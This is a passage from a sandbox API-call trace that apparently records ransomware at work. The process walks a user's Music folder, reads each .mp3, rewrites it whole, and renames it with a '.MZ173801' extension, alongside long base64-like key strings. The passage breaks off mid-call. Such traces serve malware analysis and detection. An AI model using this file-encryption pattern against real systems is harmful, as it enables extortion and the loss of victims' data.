lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0116.358] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0116.358] GetCurrentThreadId () returned 0x1358 [0116.358] GetCurrentThreadId () returned 0x1358 [0116.358] GetCurrentThreadId () returned 0x1358 [0116.358] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\6o05.mp3" (normalized: "c:\\users\\fd1hvy\\music\\6o05.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f0 [0116.358] SetFilePointer (in: hFile=0x3f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0116.358] SetFilePointer (in: hFile=0x3f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0116.358] SetFilePointer (in: hFile=0x3f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x60f8 [0116.358] SetFilePointer (in: hFile=0x3f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0116.358] ReadFile (in: hFile=0x3f0, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x60f8, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x60f8, lpOverlapped=0x0) returned 1 [0116.359] CloseHandle (hObject=0x3f0) returned 1 [0116.360] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\6o05.mp3" (normalized: "c:\\users\\fd1hvy\\music\\6o05.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f0 [0116.361] WriteFile (in: hFile=0x3f0, lpBuffer=0x2439b60*, nNumberOfBytesToWrite=0x60f8, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2439b60*, lpNumberOfBytesWritten=0x19f9bc*=0x60f8, lpOverlapped=0x0) returned 1 [0116.362] CloseHandle (hObject=0x3f0) returned 1 [0116.363] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\6o05.mp3" (normalized: "c:\\users\\fd1hvy\\music\\6o05.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\6o05.mp3.MZ173801" (normalized: "c:\\users\\fd1hvy\\music\\6o05.mp3.mz173801")) returned 1 [0116.364] GetCurrentThreadId () returned 0x1358 [0116.364] GetCurrentThreadId () returned 0x1358 [0116.365] GetCurrentThreadId () returned 0x1358 [0116.365] GetCurrentThreadId () returned 0x1358 [0116.365] GetCurrentThreadId () returned 0x1358 [0116.365] GetCurrentThreadId () returned 0x1358 [0116.365] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x4409f518, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x4409f518, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce3d633b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0116.365] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0116.365] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0116.365] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c075df0, ftCreationTime.dwHighDateTime=0x1d5ea90, ftLastAccessTime.dwLowDateTime=0xb8540070, ftLastAccessTime.dwHighDateTime=0x1d5eb33, ftLastWriteTime.dwLowDateTime=0xb8540070, ftLastWriteTime.dwHighDateTime=0x1d5eb33, nFileSizeHigh=0x0, nFileSizeLow=0x15d22, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="EtLEEKM-JP9vt.mp3", cAlternateFileName="ETLEEK~1.MP3")) returned 1 [0116.365] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0116.365] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0116.365] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\EtLEEKM-JP9vt.mp3" (normalized: "c:\\users\\fd1hvy\\music\\etleekm-jp9vt.mp3"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c075df0, ftCreationTime.dwHighDateTime=0x1d5ea90, ftLastAccessTime.dwLowDateTime=0xb8540070, ftLastAccessTime.dwHighDateTime=0x1d5eb33, ftLastWriteTime.dwLowDateTime=0xb8540070, ftLastWriteTime.dwHighDateTime=0x1d5eb33, nFileSizeHigh=0x0, nFileSizeLow=0x15d22)) returned 1 [0116.365] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0116.365] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0116.366] GetCurrentThreadId () returned 0x1358 [0116.366] GetCurrentThreadId () returned 0x1358 [0116.366] GetCurrentThreadId () returned 0x1358 [0116.366] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0116.366] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0116.366] GetCurrentThreadId () returned 0x1358 [0116.366] GetCurrentThreadId () returned 0x1358 [0116.366] GetCurrentThreadId () returned 0x1358 [0116.366] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\EtLEEKM-JP9vt.mp3" (normalized: "c:\\users\\fd1hvy\\music\\etleekm-jp9vt.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f0 [0116.366] SetFilePointer (in: hFile=0x3f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0116.367] SetFilePointer (in: hFile=0x3f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0116.367] SetFilePointer (in: hFile=0x3f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x15d22 [0116.367] SetFilePointer (in: hFile=0x3f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0116.367] ReadFile (in: hFile=0x3f0, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x15d22, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x15d22, lpOverlapped=0x0) returned 1 [0116.368] CloseHandle (hObject=0x3f0) returned 1 [0116.369] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\EtLEEKM-JP9vt.mp3" (normalized: "c:\\users\\fd1hvy\\music\\etleekm-jp9vt.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f0 [0116.639] WriteFile (in: hFile=0x3f0, lpBuffer=0x23c2ad0*, nNumberOfBytesToWrite=0x15d22, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x23c2ad0*, lpNumberOfBytesWritten=0x19f9bc*=0x15d22, lpOverlapped=0x0) returned 1 [0116.641] CloseHandle (hObject=0x3f0) returned 1 [0116.646] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\EtLEEKM-JP9vt.mp3" (normalized: "c:\\users\\fd1hvy\\music\\etleekm-jp9vt.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\EtLEEKM-JP9vt.mp3.MZ173801" (normalized: "c:\\users\\fd1hvy\\music\\etleekm-jp9vt.mp3.mz173801")) returned 1 [0116.647] GetCurrentThreadId () returned 0x1358 [0116.647] GetCurrentThreadId () returned 0x1358 [0116.647] GetCurrentThreadId () returned 0x1358 [0116.647] GetCurrentThreadId () returned 0x1358 [0116.647] GetCurrentThreadId () returned 0x1358 [0116.647] GetCurrentThreadId () returned 0x1358 [0116.647] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf06fcd0, ftCreationTime.dwHighDateTime=0x1d5e3ee, ftLastAccessTime.dwLowDateTime=0x8032efa0, ftLastAccessTime.dwHighDateTime=0x1d5e4ab, ftLastWriteTime.dwLowDateTime=0x8032efa0, ftLastWriteTime.dwHighDateTime=0x1d5e4ab, nFileSizeHigh=0x0, nFileSizeLow=0x3988, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="hhHYj9Pnudi.mp3", cAlternateFileName="HHHYJ9~1.MP3")) returned 1 [0116.647] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0116.647] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0116.647] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\hhHYj9Pnudi.mp3" (normalized: "c:\\users\\fd1hvy\\music\\hhhyj9pnudi.mp3"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf06fcd0, ftCreationTime.dwHighDateTime=0x1d5e3ee, ftLastAccessTime.dwLowDateTime=0x8032efa0, ftLastAccessTime.dwHighDateTime=0x1d5e4ab, ftLastWriteTime.dwLowDateTime=0x8032efa0, ftLastWriteTime.dwHighDateTime=0x1d5e4ab, nFileSizeHigh=0x0, nFileSizeLow=0x3988)) returned 1 [0116.648] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0116.648] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 